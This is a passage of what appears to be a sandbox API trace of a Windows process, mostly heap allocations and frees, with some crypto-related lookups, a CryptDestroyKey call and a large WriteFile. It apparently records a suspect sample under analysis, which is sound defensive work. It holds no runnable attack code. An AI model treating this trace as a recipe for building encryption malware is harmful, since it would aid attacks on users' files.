[0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0268.101] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.101] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0268.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.101] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0268.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0268.101] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.101] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0268.102] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.102] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7320) returned 0x2f32cb8 [0268.102] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7320) returned 0x2f41308 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f32cb8 | out: hHeap=0x970000) returned 1 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7320) returned 0x2f32cb8 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f41308 | out: hHeap=0x970000) returned 1 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.103] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7320) returned 0x2f41308 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f32cb8 | out: hHeap=0x970000) returned 1 [0268.103] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52078 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0268.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2b990 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0268.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24668 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f39fe0 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0268.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0268.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d340 | out: hHeap=0x970000) returned 1 [0268.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0268.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7320) returned 0x2f16018 [0268.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f41308 | out: hHeap=0x970000) returned 1 [0268.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.112] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0268.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.144] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.144] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.144] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7320) returned 0x2f1d340 [0268.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.145] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f1d340*, nNumberOfBytesToWrite=0x7320, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f1d340*, lpNumberOfBytesWritten=0x8cf5e4*=0x7320, lpOverlapped=0x0) returned 1 [0268.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d340 | out: hHeap=0x970000) returned 1 [0268.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0268.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0268.148] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0268.148] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.148] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.148] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e518e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0268.149] CryptDestroyKey (hKey=0xa86f50) returned 1 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.151] HeapFree (in: hHeap=0x970000, 